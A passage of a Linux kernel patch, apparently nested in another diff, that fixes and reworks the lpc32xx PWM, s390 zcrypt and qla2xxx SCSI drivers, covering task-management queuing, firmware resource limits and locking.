+diff --git a/drivers/pwm/pwm-lpc32xx.c b/drivers/pwm/pwm-lpc32xx.c
+index 86a0ea0f6955c..806f0bb3ad6d8 100644
+--- a/drivers/pwm/pwm-lpc32xx.c
++++ b/drivers/pwm/pwm-lpc32xx.c
+@@ -51,10 +51,10 @@ static int lpc32xx_pwm_config(struct pwm_chip *chip, struct pwm_device *pwm,
+ 	if (duty_cycles > 255)
+ 		duty_cycles = 255;
+ 
+-	val = readl(lpc32xx->base + (pwm->hwpwm << 2));
++	val = readl(lpc32xx->base);
+ 	val &= ~0xFFFF;
+ 	val |= (period_cycles << 8) | duty_cycles;
+-	writel(val, lpc32xx->base + (pwm->hwpwm << 2));
++	writel(val, lpc32xx->base);
+ 
+ 	return 0;
+ }
+@@ -69,9 +69,9 @@ static int lpc32xx_pwm_enable(struct pwm_chip *chip, struct pwm_device *pwm)
+ 	if (ret)
+ 		return ret;
+ 
+-	val = readl(lpc32xx->base + (pwm->hwpwm << 2));
++	val = readl(lpc32xx->base);
+ 	val |= PWM_ENABLE;
+-	writel(val, lpc32xx->base + (pwm->hwpwm << 2));
++	writel(val, lpc32xx->base);
+ 
+ 	return 0;
+ }
+@@ -81,9 +81,9 @@ static void lpc32xx_pwm_disable(struct pwm_chip *chip, struct pwm_device *pwm)
+ 	struct lpc32xx_pwm_chip *lpc32xx = to_lpc32xx_pwm_chip(chip);
+ 	u32 val;
+ 
+-	val = readl(lpc32xx->base + (pwm->hwpwm << 2));
++	val = readl(lpc32xx->base);
+ 	val &= ~PWM_ENABLE;
+-	writel(val, lpc32xx->base + (pwm->hwpwm << 2));
++	writel(val, lpc32xx->base);
+ 
+ 	clk_disable_unprepare(lpc32xx->clk);
+ }
+@@ -141,9 +141,9 @@ static int lpc32xx_pwm_probe(struct platform_device *pdev)
+ 	lpc32xx->chip.npwm = 1;
+ 
+ 	/* If PWM is disabled, configure the output to the default value */
+-	val = readl(lpc32xx->base + (lpc32xx->chip.pwms[0].hwpwm << 2));
++	val = readl(lpc32xx->base);
+ 	val &= ~PWM_PIN_LEVEL;
+-	writel(val, lpc32xx->base + (lpc32xx->chip.pwms[0].hwpwm << 2));
++	writel(val, lpc32xx->base);
+ 
+ 	ret = devm_pwmchip_add(&pdev->dev, &lpc32xx->chip);
+ 	if (ret < 0) {
+diff --git a/drivers/s390/crypto/zcrypt_api.c b/drivers/s390/crypto/zcrypt_api.c
+index f94b43ce9a658..28e34d155334b 100644
+--- a/drivers/s390/crypto/zcrypt_api.c
++++ b/drivers/s390/crypto/zcrypt_api.c
+@@ -441,6 +441,7 @@ static int zcdn_create(const char *name)
+ 			 ZCRYPT_NAME "_%d", (int)MINOR(devt));
+ 	nodename[sizeof(nodename) - 1] = '\0';
+ 	if (dev_set_name(&zcdndev->device, nodename)) {
++		kfree(zcdndev);
+ 		rc = -EINVAL;
+ 		goto unlockout;
+ 	}
+diff --git a/drivers/scsi/qla2xxx/qla_attr.c b/drivers/scsi/qla2xxx/qla_attr.c
+index 64734d6e8ccb1..07fbaa452d8a1 100644
+--- a/drivers/scsi/qla2xxx/qla_attr.c
++++ b/drivers/scsi/qla2xxx/qla_attr.c
+@@ -3093,8 +3093,6 @@ qla24xx_vport_create(struct fc_vport *fc_vport, bool disable)
+ 			vha->flags.difdix_supported = 1;
+ 			ql_dbg(ql_dbg_user, vha, 0x7082,
+ 			    "Registered for DIF/DIX type 1 and 3 protection.\n");
+-			if (ql2xenabledif == 1)
+-				prot = SHOST_DIX_TYPE0_PROTECTION;
+ 			scsi_host_set_prot(vha->host,
+ 			    prot | SHOST_DIF_TYPE1_PROTECTION
+ 			    | SHOST_DIF_TYPE2_PROTECTION
+diff --git a/drivers/scsi/qla2xxx/qla_dbg.c b/drivers/scsi/qla2xxx/qla_dbg.c
+index d7e8454304cee..ab637324262ff 100644
+--- a/drivers/scsi/qla2xxx/qla_dbg.c
++++ b/drivers/scsi/qla2xxx/qla_dbg.c
+@@ -18,7 +18,7 @@
+  * | Queue Command and IO tracing |       0x3074       | 0x300b         |
+  * |                              |                    | 0x3027-0x3028  |
+  * |                              |                    | 0x303d-0x3041  |
+- * |                              |                    | 0x302d,0x3033  |
++ * |                              |                    | 0x302e,0x3033  |
+  * |                              |                    | 0x3036,0x3038  |
+  * |                              |                    | 0x303a		|
+  * | DPC Thread                   |       0x4023       | 0x4002,0x4013  |
+diff --git a/drivers/scsi/qla2xxx/qla_def.h b/drivers/scsi/qla2xxx/qla_def.h
+index 5a2f629d18e69..7d282906598f3 100644
+--- a/drivers/scsi/qla2xxx/qla_def.h
++++ b/drivers/scsi/qla2xxx/qla_def.h
+@@ -458,6 +458,7 @@ static inline be_id_t port_id_to_be_id(port_id_t port_id)
+ }
+ 
+ struct tmf_arg {
++	struct list_head tmf_elem;
+ 	struct qla_qpair *qpair;
+ 	struct fc_port *fcport;
+ 	struct scsi_qla_host *vha;
+@@ -2534,7 +2535,6 @@ enum rscn_addr_format {
+ typedef struct fc_port {
+ 	struct list_head list;
+ 	struct scsi_qla_host *vha;
+-	struct list_head tmf_pending;
+ 
+ 	unsigned int conf_compl_supported:1;
+ 	unsigned int deleted:2;
+@@ -2555,9 +2555,6 @@ typedef struct fc_port {
+ 	unsigned int do_prli_nvme:1;
+ 
+ 	uint8_t nvme_flag;
+-	uint8_t active_tmf;
+-#define MAX_ACTIVE_TMF 8
+-
+ 	uint8_t node_name[WWN_SIZE];
+ 	uint8_t port_name[WWN_SIZE];
+ 	port_id_t d_id;
+@@ -3743,6 +3740,16 @@ struct qla_fw_resources {
+ 	u16 pad;
+ };
+ 
++struct qla_fw_res {
++	u16      iocb_total;
++	u16      iocb_limit;
++	atomic_t iocb_used;
++
++	u16      exch_total;
++	u16      exch_limit;
++	atomic_t exch_used;
++};
++
+ #define QLA_IOCB_PCT_LIMIT 95
+ 
+ /*Queue pair data structure */
+@@ -4370,7 +4377,6 @@ struct qla_hw_data {
+ 	uint8_t		aen_mbx_count;
+ 	atomic_t	num_pend_mbx_stage1;
+ 	atomic_t	num_pend_mbx_stage2;
+-	atomic_t	num_pend_mbx_stage3;
+ 	uint16_t	frame_payload_size;
+ 
+ 	uint32_t	login_retry_count;
+@@ -4640,6 +4646,8 @@ struct qla_hw_data {
+ 		uint32_t	flt_region_aux_img_status_sec;
+ 	};
+ 	uint8_t         active_image;
++	uint8_t active_tmf;
++#define MAX_ACTIVE_TMF 8
+ 
+ 	/* Needed for BEACON */
+ 	uint16_t        beacon_blink_led;
+@@ -4654,6 +4662,8 @@ struct qla_hw_data {
+ 
+ 	struct qla_msix_entry *msix_entries;
+ 
++	struct list_head tmf_pending;
++	struct list_head tmf_active;
+ 	struct list_head        vp_list;        /* list of VP */
+ 	unsigned long   vp_idx_map[(MAX_MULTI_ID_FABRIC / 8) /
+ 			sizeof(unsigned long)];
+@@ -4782,6 +4792,7 @@ struct qla_hw_data {
+ 	spinlock_t sadb_lock;	/* protects list */
+ 	struct els_reject elsrej;
+ 	u8 edif_post_stop_cnt_down;
++	struct qla_fw_res fwres ____cacheline_aligned;
+ };
+ 
+ #define RX_ELS_SIZE (roundup(sizeof(struct enode) + ELS_MAX_PAYLOAD, SMP_CACHE_BYTES))
+diff --git a/drivers/scsi/qla2xxx/qla_dfs.c b/drivers/scsi/qla2xxx/qla_dfs.c
+index 1925cc6897b68..f060e593685de 100644
+--- a/drivers/scsi/qla2xxx/qla_dfs.c
++++ b/drivers/scsi/qla2xxx/qla_dfs.c
+@@ -276,6 +276,16 @@ qla_dfs_fw_resource_cnt_show(struct seq_file *s, void *unused)
+ 
+ 		seq_printf(s, "estimate exchange used[%d] high water limit [%d] n",
+ 			   exch_used, ha->base_qpair->fwres.exch_limit);
++
++		if (ql2xenforce_iocb_limit == 2) {
++			iocbs_used = atomic_read(&ha->fwres.iocb_used);
++			exch_used  = atomic_read(&ha->fwres.exch_used);
++			seq_printf(s, "        estimate iocb2 used [%d] high water limit [%d]\n",
++					iocbs_used, ha->fwres.iocb_limit);
++
++			seq_printf(s, "        estimate exchange2 used[%d] high water limit [%d] \n",
++					exch_used, ha->fwres.exch_limit);
++		}
+ 	}
+ 
+ 	return 0;
+diff --git a/drivers/scsi/qla2xxx/qla_gbl.h b/drivers/scsi/qla2xxx/qla_gbl.h
+index 316122709b0e6..2e4537f9e5b50 100644
+--- a/drivers/scsi/qla2xxx/qla_gbl.h
++++ b/drivers/scsi/qla2xxx/qla_gbl.h
+@@ -143,6 +143,7 @@ void qla_edif_sess_down(struct scsi_qla_host *vha, struct fc_port *sess);
+ void qla_edif_clear_appdata(struct scsi_qla_host *vha,
+ 			    struct fc_port *fcport);
+ const char *sc_to_str(uint16_t cmd);
++void qla_adjust_iocb_limit(scsi_qla_host_t *vha);
+ 
+ /*
+  * Global Data in qla_os.c source file.
+diff --git a/drivers/scsi/qla2xxx/qla_init.c b/drivers/scsi/qla2xxx/qla_init.c
+index 30bbf33e3a6aa..36abdb0de1694 100644
+--- a/drivers/scsi/qla2xxx/qla_init.c
++++ b/drivers/scsi/qla2xxx/qla_init.c
+@@ -502,6 +502,7 @@ static
+ void qla24xx_handle_adisc_event(scsi_qla_host_t *vha, struct event_arg *ea)
+ {
+ 	struct fc_port *fcport = ea->fcport;
++	unsigned long flags;
+ 
+ 	ql_dbg(ql_dbg_disc, vha, 0x20d2,
+ 	    "%s %8phC DS %d LS %d rc %d login %d|%d rscn %d|%d lid %d\n",
+@@ -516,9 +517,15 @@ void qla24xx_handle_adisc_event(scsi_qla_host_t *vha, struct event_arg *ea)
+ 		ql_dbg(ql_dbg_disc, vha, 0x2066,
+ 		    "%s %8phC: adisc fail: post delete\n",
+ 		    __func__, ea->fcport->port_name);
++
++		spin_lock_irqsave(&vha->work_lock, flags);
+ 		/* deleted = 0 & logout_on_delete = force fw cleanup */
+-		fcport->deleted = 0;
++		if (fcport->deleted == QLA_SESS_DELETED)
++			fcport->deleted = 0;
++
+ 		fcport->logout_on_delete = 1;
++		spin_unlock_irqrestore(&vha->work_lock, flags);
++
+ 		qlt_schedule_sess_for_deletion(ea->fcport);
+ 		return;
+ 	}
+@@ -1128,7 +1135,7 @@ int qla24xx_async_gnl(struct scsi_qla_host *vha, fc_port_t *fcport)
+ 	u16 *mb;
+ 
+ 	if (!vha->flags.online || (fcport->flags & FCF_ASYNC_SENT))
+-		return rval;
++		goto done;
+ 
+ 	ql_dbg(ql_dbg_disc, vha, 0x20d9,
+ 	    "Async-gnlist WWPN %8phC \n", fcport->port_name);
+@@ -1182,8 +1189,9 @@ int qla24xx_async_gnl(struct scsi_qla_host *vha, fc_port_t *fcport)
+ done_free_sp:
+ 	/* ref: INIT */
+ 	kref_put(&sp->cmd_kref, qla2x00_sp_release);
++	fcport->flags &= ~(FCF_ASYNC_SENT);
+ done:
+-	fcport->flags &= ~(FCF_ASYNC_ACTIVE | FCF_ASYNC_SENT);
++	fcport->flags &= ~(FCF_ASYNC_ACTIVE);
+ 	return rval;
+ }
+ 
+@@ -1440,7 +1448,6 @@ void __qla24xx_handle_gpdb_event(scsi_qla_host_t *vha, struct event_arg *ea)
+ 
+ 	spin_lock_irqsave(&vha->hw->tgt.sess_lock, flags);
+ 	ea->fcport->login_gen++;
+-	ea->fcport->deleted = 0;
+ 	ea->fcport->logout_on_delete = 1;
+ 
+ 	if (!ea->fcport->login_succ && !IS_SW_RESV_ADDR(ea->fcport->d_id)) {
+@@ -1997,12 +2004,11 @@ qla2x00_tmf_iocb_timeout(void *data)
+ 	int rc, h;
+ 	unsigned long flags;
+ 
+-	if (sp->type == SRB_MARKER) {
+-		complete(&tmf->u.tmf.comp);
+-		return;
+-	}
++	if (sp->type == SRB_MARKER)
++		rc = QLA_FUNCTION_FAILED;
++	else
++		rc = qla24xx_async_abort_cmd(sp, false);
+ 
+-	rc = qla24xx_async_abort_cmd(sp, false);
+ 	if (rc) {
+ 		spin_lock_irqsave(sp->qpair->qp_lock_ptr, flags);
+ 		for (h = 1; h < sp->qpair->req->num_outstanding_cmds; h++) {
+@@ -2033,10 +2039,14 @@ static void qla_marker_sp_done(srb_t *sp, int res)
+ 	complete(&tmf->u.tmf.comp);
+ }
+ 
+-#define  START_SP_W_RETRIES(_sp, _rval) \
++#define  START_SP_W_RETRIES(_sp, _rval, _chip_gen, _login_gen) \
+ {\
+ 	int cnt = 5; \
+ 	do { \
++		if (_chip_gen != sp->vha->hw->chip_reset || _login_gen != sp->fcport->login_gen) {\
++			_rval = EINVAL; \
++			break; \
++		} \
+ 		_rval = qla2x00_start_sp(_sp); \
+ 		if (_rval == EAGAIN) \
+ 			msleep(1); \
+@@ -2059,6 +2069,7 @@ qla26xx_marker(struct tmf_arg *arg)
+ 	srb_t *sp;
+ 	int rval = QLA_FUNCTION_FAILED;
+ 	fc_port_t *fcport = arg->fcport;
++	u32 chip_gen, login_gen;
+ 
+ 	if (TMF_NOT_READY(arg->fcport)) {
+ 		ql_dbg(ql_dbg_taskm, vha, 0x8039,
+@@ -2068,6 +2079,9 @@ qla26xx_marker(struct tmf_arg *arg)
+ 		return QLA_SUSPENDED;
+ 	}
+ 
++	chip_gen = vha->hw->chip_reset;
++	login_gen = fcport->login_gen;
++
+ 	/* ref: INIT */
+ 	sp = qla2xxx_get_qpair_sp(vha, arg->qpair, fcport, GFP_KERNEL);
+ 	if (!sp)
+@@ -2085,7 +2099,7 @@ qla26xx_marker(struct tmf_arg *arg)
+ 	tm_iocb->u.tmf.loop_id = fcport->loop_id;
+ 	tm_iocb->u.tmf.vp_index = vha->vp_idx;
+ 
+-	START_SP_W_RETRIES(sp, rval);
++	START_SP_W_RETRIES(sp, rval, chip_gen, login_gen);
+ 
+ 	ql_dbg(ql_dbg_taskm, vha, 0x8006,
+ 	    "Async-marker hdl=%x loop-id=%x portid=%06x modifier=%x lun=%lld qp=%d rval %d.\n",
+@@ -2124,6 +2138,17 @@ static void qla2x00_tmf_sp_done(srb_t *sp, int res)
+ 	complete(&tmf->u.tmf.comp);
+ }
+ 
++static int qla_tmf_wait(struct tmf_arg *arg)
++{
++	/* there are only 2 types of error handling that reaches here, lun or target reset */
++	if (arg->flags & (TCF_LUN_RESET | TCF_ABORT_TASK_SET | TCF_CLEAR_TASK_SET))
++		return qla2x00_eh_wait_for_pending_commands(arg->vha,
++		    arg->fcport->d_id.b24, arg->lun, WAIT_LUN);
++	else
++		return qla2x00_eh_wait_for_pending_commands(arg->vha,
++		    arg->fcport->d_id.b24, arg->lun, WAIT_TARGET);
++}
++
+ static int
+ __qla2x00_async_tm_cmd(struct tmf_arg *arg)
+ {
+@@ -2131,8 +2156,9 @@ __qla2x00_async_tm_cmd(struct tmf_arg *arg)
+ 	struct srb_iocb *tm_iocb;
+ 	srb_t *sp;
+ 	int rval = QLA_FUNCTION_FAILED;
+-
+ 	fc_port_t *fcport = arg->fcport;
++	u32 chip_gen, login_gen;
++	u64 jif;
+ 
+ 	if (TMF_NOT_READY(arg->fcport)) {
+ 		ql_dbg(ql_dbg_taskm, vha, 0x8032,
+@@ -2142,6 +2168,9 @@ __qla2x00_async_tm_cmd(struct tmf_arg *arg)
+ 		return QLA_SUSPENDED;
+ 	}
+ 
++	chip_gen = vha->hw->chip_reset;
++	login_gen = fcport->login_gen;
++
+ 	/* ref: INIT */
+ 	sp = qla2xxx_get_qpair_sp(vha, arg->qpair, fcport, GFP_KERNEL);
+ 	if (!sp)
+@@ -2159,7 +2188,7 @@ __qla2x00_async_tm_cmd(struct tmf_arg *arg)
+ 	tm_iocb->u.tmf.flags = arg->flags;
+ 	tm_iocb->u.tmf.lun = arg->lun;
+ 
+-	START_SP_W_RETRIES(sp, rval);
++	START_SP_W_RETRIES(sp, rval, chip_gen, login_gen);
+ 
+ 	ql_dbg(ql_dbg_taskm, vha, 0x802f,
+ 	    "Async-tmf hdl=%x loop-id=%x portid=%06x ctrl=%x lun=%lld qp=%d rval=%x.\n",
+@@ -2177,8 +2206,26 @@ __qla2x00_async_tm_cmd(struct tmf_arg *arg)
+ 		    "TM IOCB failed (%x).\n", rval);
+ 	}
+ 
+-	if (!test_bit(UNLOADING, &vha->dpc_flags) && !IS_QLAFX00(vha->hw))
+-		rval = qla26xx_marker(arg);
++	if (!test_bit(UNLOADING, &vha->dpc_flags) && !IS_QLAFX00(vha->hw)) {
++		jif = jiffies;
++		if (qla_tmf_wait(arg)) {
++			ql_log(ql_log_info, vha, 0x803e,
++			       "Waited %u ms Nexus=%ld:%06x:%llu.\n",
++			       jiffies_to_msecs(jiffies - jif), vha->host_no,
++			       fcport->d_id.b24, arg->lun);
++		}
++
++		if (chip_gen == vha->hw->chip_reset && login_gen == fcport->login_gen) {
++			rval = qla26xx_marker(arg);
++		} else {
++			ql_log(ql_log_info, vha, 0x803e,
++			       "Skip Marker due to disruption. Nexus=%ld:%06x:%llu.\n",
++			       vha->host_no, fcport->d_id.b24, arg->lun);
++			rval = QLA_FUNCTION_FAILED;
++		}
++	}
++	if (tm_iocb->u.tmf.data)
++		rval = tm_iocb->u.tmf.data;
+ 
+ done_free_sp:
+ 	/* ref: INIT */
+@@ -2187,30 +2234,42 @@ done:
+ 	return rval;
+ }
+ 
+-static void qla_put_tmf(fc_port_t *fcport)
++static void qla_put_tmf(struct tmf_arg *arg)
+ {
+-	struct scsi_qla_host *vha = fcport->vha;
++	struct scsi_qla_host *vha = arg->vha;
+ 	struct qla_hw_data *ha = vha->hw;
+ 	unsigned long flags;
+ 
+ 	spin_lock_irqsave(&ha->tgt.sess_lock, flags);
+-	fcport->active_tmf--;
++	ha->active_tmf--;
++	list_del(&arg->tmf_elem);
+ 	spin_unlock_irqrestore(&ha->tgt.sess_lock, flags);
+ }
+ 
+ static
+-int qla_get_tmf(fc_port_t *fcport)
++int qla_get_tmf(struct tmf_arg *arg)
+ {
+-	struct scsi_qla_host *vha = fcport->vha;
++	struct scsi_qla_host *vha = arg->vha;
+ 	struct qla_hw_data *ha = vha->hw;
+ 	unsigned long flags;
++	fc_port_t *fcport = arg->fcport;
+ 	int rc = 0;
+-	LIST_HEAD(tmf_elem);
++	struct tmf_arg *t;
+ 
+ 	spin_lock_irqsave(&ha->tgt.sess_lock, flags);
+-	list_add_tail(&tmf_elem, &fcport->tmf_pending);
++	list_for_each_entry(t, &ha->tmf_active, tmf_elem) {
++		if (t->fcport == arg->fcport && t->lun == arg->lun) {
++			/* reject duplicate TMF */
++			ql_log(ql_log_warn, vha, 0x802c,
++			       "found duplicate TMF.  Nexus=%ld:%06x:%llu.\n",
++			       vha->host_no, fcport->d_id.b24, arg->lun);
++			spin_unlock_irqrestore(&ha->tgt.sess_lock, flags);
++			return -EINVAL;
++		}
++	}
+ 
+-	while (fcport->active_tmf >= MAX_ACTIVE_TMF) {
++	list_add_tail(&arg->tmf_elem, &ha->tmf_pending);
++	while (ha->active_tmf >= MAX_ACTIVE_TMF) {
+ 		spin_unlock_irqrestore(&ha->tgt.sess_lock, flags);
+ 
+ 		msleep(1);
+@@ -2222,15 +2281,17 @@ int qla_get_tmf(fc_port_t *fcport)
+ 			rc = EIO;
+ 			break;
+ 		}
+-		if (fcport->active_tmf < MAX_ACTIVE_TMF &&
+-		    list_is_first(&tmf_elem, &fcport->tmf_pending))
++		if (ha->active_tmf < MAX_ACTIVE_TMF &&
++		    list_is_first(&arg->tmf_elem, &ha->tmf_pending))
+ 			break;
+ 	}
+ 
+-	list_del(&tmf_elem);
++	list_del(&arg->tmf_elem);
+ 
+-	if (!rc)
+-		fcport->active_tmf++;
++	if (!rc) {
++		ha->active_tmf++;
++		list_add_tail(&arg->tmf_elem, &ha->tmf_active);
++	}
+ 
+ 	spin_unlock_irqrestore(&ha->tgt.sess_lock, flags);
+ 
+@@ -2242,9 +2303,8 @@ qla2x00_async_tm_cmd(fc_port_t *fcport, uint32_t flags, uint64_t lun,
+ 		     uint32_t tag)
+ {
+ 	struct scsi_qla_host *vha = fcport->vha;
+-	struct qla_qpair *qpair;
+ 	struct tmf_arg a;
+-	int i, rval = QLA_SUCCESS;
++	int rval = QLA_SUCCESS;
+ 
+ 	if (TMF_NOT_READY(fcport))
+ 		return QLA_SUSPENDED;
+@@ -2252,47 +2312,22 @@ qla2x00_async_tm_cmd(fc_port_t *fcport, uint32_t flags, uint64_t lun,
+ 	a.vha = fcport->vha;
+ 	a.fcport = fcport;
+ 	a.lun = lun;
++	a.flags = flags;
++	INIT_LIST_HEAD(&a.tmf_elem);
++
+ 	if (flags & (TCF_LUN_RESET|TCF_ABORT_TASK_SET|TCF_CLEAR_TASK_SET|TCF_CLEAR_ACA)) {
+ 		a.modifier = MK_SYNC_ID_LUN;
+-
+-		if (qla_get_tmf(fcport))
+-			return QLA_FUNCTION_FAILED;
+ 	} else {
+ 		a.modifier = MK_SYNC_ID;
+ 	}
+ 
+-	if (vha->hw->mqenable) {
+-		for (i = 0; i < vha->hw->num_qpairs; i++) {
+-			qpair = vha->hw->queue_pair_map[i];
+-			if (!qpair)
+-				continue;
+-
+-			if (TMF_NOT_READY(fcport)) {
+-				ql_log(ql_log_warn, vha, 0x8026,
+-				    "Unable to send TM due to disruption.\n");
+-				rval = QLA_SUSPENDED;
+-				break;
+-			}
+-
+-			a.qpair = qpair;
+-			a.flags = flags|TCF_NOTMCMD_TO_TARGET;
+-			rval = __qla2x00_async_tm_cmd(&a);
+-			if (rval)
+-				break;
+-		}
+-	}
+-
+-	if (rval)
+-		goto bailout;
++	if (qla_get_tmf(&a))
++		return QLA_FUNCTION_FAILED;
+ 
+ 	a.qpair = vha->hw->base_qpair;
+-	a.flags = flags;
+ 	rval = __qla2x00_async_tm_cmd(&a);
+ 
+-bailout:
+-	if (a.modifier == MK_SYNC_ID_LUN)
+-		qla_put_tmf(fcport);
+-
++	qla_put_tmf(&a);
+ 	return rval;
+ }
+ 
+@@ -4148,39 +4183,61 @@ out:
+ 	return ha->flags.lr_detected;
+ }
+ 
+-void qla_init_iocb_limit(scsi_qla_host_t *vha)
++static void __qla_adjust_iocb_limit(struct qla_qpair *qpair)
+ {
+-	u16 i, num_qps;
+-	u32 limit;
+-	struct qla_hw_data *ha = vha->hw;
++	u8 num_qps;
++	u16 limit;
++	struct qla_hw_data *ha = qpair->vha->hw;
+ 
+ 	num_qps = ha->num_qpairs + 1;
+ 	limit = (ha->orig_fw_iocb_count * QLA_IOCB_PCT_LIMIT) / 100;
+ 
+-	ha->base_qpair->fwres.iocbs_total = ha->orig_fw_iocb_count;
+-	ha->base_qpair->fwres.iocbs_limit = limit;
+-	ha->base_qpair->fwres.iocbs_qp_limit = limit / num_qps;
+-	ha->base_qpair->fwres.iocbs_used = 0;
++	qpair->fwres.iocbs_total = ha->orig_fw_iocb_count;
++	qpair->fwres.iocbs_limit = limit;
++	qpair->fwres.iocbs_qp_limit = limit / num_qps;
++
++	qpair->fwres.exch_total = ha->orig_fw_xcb_count;
++	qpair->fwres.exch_limit = (ha->orig_fw_xcb_count *
++				   QLA_IOCB_PCT_LIMIT) / 100;
++}
++
++void qla_init_iocb_limit(scsi_qla_host_t *vha)
++{
++	u8 i;
++	struct qla_hw_data *ha = vha->hw;
+ 
+-	ha->base_qpair->fwres.exch_total = ha->orig_fw_xcb_count;
+-	ha->base_qpair->fwres.exch_limit = (ha->orig_fw_xcb_count *
+-					    QLA_IOCB_PCT_LIMIT) / 100;
++	__qla_adjust_iocb_limit(ha->base_qpair);
++	ha->base_qpair->fwres.iocbs_used = 0;
+ 	ha->base_qpair->fwres.exch_used  = 0;
+ 
+ 	for (i = 0; i < ha->max_qpairs; i++) {
+ 		if (ha->queue_pair_map[i])  {
+-			ha->queue_pair_map[i]->fwres.iocbs_total =
+-				ha->orig_fw_iocb_count;
+-			ha->queue_pair_map[i]->fwres.iocbs_limit = limit;
+-			ha->queue_pair_map[i]->fwres.iocbs_qp_limit =
+-				limit / num_qps;
++			__qla_adjust_iocb_limit(ha->queue_pair_map[i]);
+ 			ha->queue_pair_map[i]->fwres.iocbs_used = 0;
+-			ha->queue_pair_map[i]->fwres.exch_total = ha->orig_fw_xcb_count;
+-			ha->queue_pair_map[i]->fwres.exch_limit =
+-				(ha->orig_fw_xcb_count * QLA_IOCB_PCT_LIMIT) / 100;
+ 			ha->queue_pair_map[i]->fwres.exch_used = 0;
+ 		}
+ 	}
++
++	ha->fwres.iocb_total = ha->orig_fw_iocb_count;
++	ha->fwres.iocb_limit = (ha->orig_fw_iocb_count * QLA_IOCB_PCT_LIMIT) / 100;
++	ha->fwres.exch_total = ha->orig_fw_xcb_count;
++	ha->fwres.exch_limit = (ha->orig_fw_xcb_count * QLA_IOCB_PCT_LIMIT) / 100;
++
++	atomic_set(&ha->fwres.iocb_used, 0);
++	atomic_set(&ha->fwres.exch_used, 0);
++}
++
++void qla_adjust_iocb_limit(scsi_qla_host_t *vha)
++{
++	u8 i;
++	struct qla_hw_data *ha = vha->hw;
++
++	__qla_adjust_iocb_limit(ha->base_qpair);
++
++	for (i = 0; i < ha->max_qpairs; i++) {
++		if (ha->queue_pair_map[i])
++			__qla_adjust_iocb_limit(ha->queue_pair_map[i]);
++	}
+ }
+ 
+ /**
+@@ -4778,15 +4835,16 @@ qla2x00_init_rings(scsi_qla_host_t *vha)
+ 	if (ha->flags.edif_enabled)
+ 		mid_init_cb->init_cb.frame_payload_size = cpu_to_le16(ELS_MAX_PAYLOAD);
+ 
++	QLA_FW_STARTED(ha);
+ 	rval = qla2x00_init_firmware(vha, ha->init_cb_size);
+ next_check:
+ 	if (rval) {
++		QLA_FW_STOPPED(ha);
+ 		ql_log(ql_log_fatal, vha, 0x00d2,
+ 		    "Init Firmware **** FAILED ****.\n");
+ 	} else {
+ 		ql_dbg(ql_dbg_init, vha, 0x00d3,
+ 		    "Init Firmware -- success.\n");
+-		QLA_FW_STARTED(ha);
+ 		vha->u_ql2xexchoffld = vha->u_ql2xiniexchg = 0;
+ 	}
+ 
+@@ -5528,7 +5586,6 @@ qla2x00_alloc_fcport(scsi_qla_host_t *vha, gfp_t flags)
+ 	INIT_WORK(&fcport->reg_work, qla_register_fcport_fn);
+ 	INIT_LIST_HEAD(&fcport->gnl_entry);
+ 	INIT_LIST_HEAD(&fcport->list);
+-	INIT_LIST_HEAD(&fcport->tmf_pending);
+ 
+ 	INIT_LIST_HEAD(&fcport->sess_cmd_list);
+ 	spin_lock_init(&fcport->sess_cmd_lock);
+@@ -6116,6 +6173,8 @@ qla2x00_reg_remote_port(scsi_qla_host_t *vha, fc_port_t *fcport)
+ void
+ qla2x00_update_fcport(scsi_qla_host_t *vha, fc_port_t *fcport)
+ {
++	unsigned long flags;
++
+ 	if (IS_SW_RESV_ADDR(fcport->d_id))
+ 		return;
+ 
+@@ -6125,7 +6184,11 @@ qla2x00_update_fcport(scsi_qla_host_t *vha, fc_port_t *fcport)
+ 	qla2x00_set_fcport_disc_state(fcport, DSC_UPD_FCPORT);
+ 	fcport->login_retry = vha->hw->login_retry_count;
+ 	fcport->flags &= ~(FCF_LOGIN_NEEDED | FCF_ASYNC_SENT);
++
++	spin_lock_irqsave(&vha->work_lock, flags);
+ 	fcport->deleted = 0;
++	spin_unlock_irqrestore(&vha->work_lock, flags);
++
+ 	if (vha->hw->current_topology == ISP_CFG_NL)
+ 		fcport->logout_on_delete = 0;
+ 	else
+@@ -7391,14 +7454,15 @@ qla2x00_abort_isp_cleanup(scsi_qla_host_t *vha)
+ 	}
+ 
+ 	/* purge MBox commands */
+-	if (atomic_read(&ha->num_pend_mbx_stage3)) {
++	spin_lock_irqsave(&ha->hardware_lock, flags);
++	if (test_bit(MBX_INTR_WAIT, &ha->mbx_cmd_flags)) {
+ 		clear_bit(MBX_INTR_WAIT, &ha->mbx_cmd_flags);
+ 		complete(&ha->mbx_intr_comp);
+ 	}
++	spin_unlock_irqrestore(&ha->hardware_lock, flags);
+ 
+ 	i = 0;
+-	while (atomic_read(&ha->num_pend_mbx_stage3) ||
+-	    atomic_read(&ha->num_pend_mbx_stage2) ||
++	while (atomic_read(&ha->num_pend_mbx_stage2) ||
+ 	    atomic_read(&ha->num_pend_mbx_stage1)) {
+ 		msleep(20);
+ 		i++;
+diff --git a/drivers/scsi/qla2xxx/qla_inline.h b/drivers/scsi/qla2xxx/qla_inline.h
+index a034699e58ae9..a7b5d11146827 100644
+--- a/drivers/scsi/qla2xxx/qla_inline.h
++++ b/drivers/scsi/qla2xxx/qla_inline.h
+@@ -386,6 +386,7 @@ enum {
+ 	RESOURCE_IOCB = BIT_0,
+ 	RESOURCE_EXCH = BIT_1,  /* exchange */
+ 	RESOURCE_FORCE = BIT_2,
++	RESOURCE_HA = BIT_3,
+ };
+ 
+ static inline int
+@@ -393,7 +394,7 @@ qla_get_fw_resources(struct qla_qpair *qp, struct iocb_resource *iores)
+ {
+ 	u16 iocbs_used, i;
+ 	u16 exch_used;
+-	struct qla_hw_data *ha = qp->vha->hw;
++	struct qla_hw_data *ha = qp->hw;
+ 
+ 	if (!ql2xenforce_iocb_limit) {
+ 		iores->res_type = RESOURCE_NONE;
+@@ -428,15 +429,69 @@ qla_get_fw_resources(struct qla_qpair *qp, struct iocb_resource *iores)
+ 			return -ENOSPC;
+ 		}
+ 	}
++
++	if (ql2xenforce_iocb_limit == 2) {
++		if ((iores->iocb_cnt + atomic_read(&ha->fwres.iocb_used)) >=
++		    ha->fwres.iocb_limit) {
++			iores->res_type = RESOURCE_NONE;
++			return -ENOSPC;
++		}
++
++		if (iores->res_type & RESOURCE_EXCH) {
++			if ((iores->exch_cnt + atomic_read(&ha->fwres.exch_used)) >=
++			    ha->fwres.exch_limit) {
++				iores->res_type = RESOURCE_NONE;
++				return -ENOSPC;
++			}
++		}
++	}
++
+ force:
+ 	qp->fwres.iocbs_used += iores->iocb_cnt;
